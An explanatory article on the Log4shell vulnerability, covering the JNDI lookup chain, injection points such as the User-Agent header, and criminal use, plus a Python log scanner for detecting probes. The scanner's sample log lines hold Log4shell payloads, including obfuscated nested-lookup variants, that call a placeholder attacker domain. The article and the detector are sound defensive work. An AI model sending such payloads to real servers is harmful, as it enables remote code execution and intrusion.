Figure 1: Log4shell exploitation worldwide (by ESET).
How the Log4shell vulnerability works
Here is the modus operandi of the Log4shell vulnerability:
The data from the user is sent to the remote server via any protocol (HTTP, for instance). The server logs the request data, which includes the malicious payload.
The pre-computed payload, hosted on a domain controlled by the attacker (attacker.example.com), triggers the Log4j vulnerability: the vulnerable server sends a lookup request to the attacker's domain via the Java Naming and Directory Interface (JNDI). From this point, the attacker controls the response and can include a URL to a remote Java class file (http://attacker.example.com/payload2.class) that is loaded into the server process. The second stage (payload2) is triggered by the injected class, which allows the attacker to execute arbitrary code (e.g., a remote shell).
The high-level diagram of this vulnerability is presented in Figure 2 below.
Figure 2: High-level diagram of the Log4shell vulnerability.
Hackers can test whether the vulnerability exists, and whether it is actually exploitable, at any input point where an external user is allowed to enter data. Among those points are input fields, username and password login forms, and HTTP headers such as User-Agent, X-Forwarded-For, or other custom headers. In the example illustrated in Figure 2 above, the User-Agent HTTP header is highlighted as an example.
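As an added example (not code from the article or its sources), the following Python detector flags JNDI lookup probes in web-server access logs such as the User-Agent header case above. Because Log4j resolves nested lookups before the `jndi:` prefix is evaluated, a naive substring match on `${jndi:` misses nested variants; the normalizer approximates Log4j's `lower`, `upper` and `:-` default-value resolution first. The log lines are constructed, and attacker.example.com is the placeholder domain used in the article.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format, User-Agent last).
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example.com/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example.com/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NOPE:-j}ndi:rmi://attacker.example.com/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:13 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F'
    'attacker.example.com%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# Innermost ${...} lookup: body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# Final check, run only after normalization.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(token: str) -> str:
    """Approximate how Log4j 2.x resolves one innermost ${token} lookup."""
    if ":-" in token:                      # ${name:key:-default} -> default
        return token.rsplit(":-", 1)[1]
    name, _, arg = token.partition(":")
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return "${" + token + "}"              # unknown lookup (e.g. jndi): keep


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups inside-out, bounded to avoid pathological input."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup after URL-decoding and normalizing."""
    return bool(_JNDI.search(normalize(unquote(line))))


def scan(lines):
    """Return indices of log lines that contain a JNDI lookup probe."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]
```

Feeding real access logs through `scan` gives a first triage list; lines that match should be correlated with outbound LDAP/RMI connections from the logging host to confirm whether the lookup was actually performed.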
How criminals are exploiting Log4shell
This vulnerability is being actively exploited in the wild by cybercriminals. It is a remote code execution (RCE) flaw, one of the most dangerous vulnerability types because it allows remote attackers to fully control servers over the Internet. Taken as a whole, the observed activity shows that cybercriminals focus on installing cryptocurrency miners and, more recently, Cobalt Strike for credential theft, lateral movement, and data exfiltration from compromised systems. Finally, ransomware deployment has been observed as the last stage of the malicious chain.
Figure 3: Conti Ransomware Log4Shell Operation.
Final thoughts and recommendations on the Log4shell vulnerability
The Log4shell vulnerability is a severe flaw that can impact many organizations worldwide. Criminals can take advantage of it to gain access to a company's internal assets and put the entire company's secrets and infrastructure at risk, for instance by stealing its data and deploying a ransomware attack. In order to prevent these kinds of scenarios, patches to mitigate this vulnerability should be applied, depending on the affected version. In addition, the flaw can be easily detected by using a specially crafted payload.
Sources:
- Log4shell initial access (AdvIntel)
- Log4shell explanation (UpGuard)
- What is Log4shell (Dynatrace)